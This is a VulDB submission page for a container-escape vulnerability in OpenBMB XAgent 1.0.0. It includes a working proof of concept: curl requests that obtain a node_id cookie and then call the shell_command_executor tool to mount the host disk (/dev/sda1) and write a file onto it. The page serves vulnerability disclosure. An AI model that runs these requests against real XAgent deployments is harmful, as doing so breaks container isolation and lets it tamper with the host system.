提交 #284427: OpenBMB XAgent v1.0.0 Container Escapes信息

标题OpenBMB XAgent v1.0.0 Container Escapes
描述Docker Enabling Privileged Mode Causes Container Escapes. 1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent) ```bash git clone https://github.com/OpenBMB/XAgent.git docker-compose up -d ``` 2. Creating Tool Container ```bash curl -v --request POST 'http://localhost:8080/get_cookie' ... < HTTP/1.1 200 OK ... < set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax ... ``` Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; 3. Execute malicious command escape container ``` curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \ '{ "tool_name":"shell_command_executor", "arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"} }' ``` The file created in containers on the host: `cat /boot/hello.txt`.
来源⚠️ https://github.com/OpenBMB/XAgent/issues/386
用户
 zznQ (UID 64000)
提交2024-02-19 10時35分 (2 年前)
管理2024-02-29 14時24分 (10 days later)
状态已接受
VulDB条目255265 [OpenBMB XAgent 1.0.0 Privileged Mode 权限提升]
积分20

上一步一览下一步

Do you want to use VulDB in your project?

Use the official API to access entries easily!